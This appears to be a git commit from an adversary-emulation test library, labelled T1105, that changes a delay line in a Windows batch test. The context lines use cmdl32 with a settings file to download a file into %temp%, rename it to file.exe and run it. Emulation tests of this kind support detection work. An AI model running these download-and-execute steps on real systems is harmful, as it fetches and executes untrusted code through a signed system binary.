T1105: Update timeout to ping (#1867)

This commit is contained in:
David McKennirey
2022-04-14 12:50:25 -04:00
committed by GitHub
parent a57b17bea6
commit 5d7a0e7939
+1 -1
View File
@@ -11,6 +11,6 @@ cmdl32 /vpn /lan %temp%\T1105\setting.txt
icacls %temp%\T1105 /remove:d %username%
move %temp%\T1105\*.tmp %temp%\T1105\file.exe
%temp%\T1105\file.exe
timeout /T 10
ping -n 10 127.0.0.1 >nul 2>&1
Taskkill /IM notepad.exe /F
Taskkill /IM Calculator.exe /F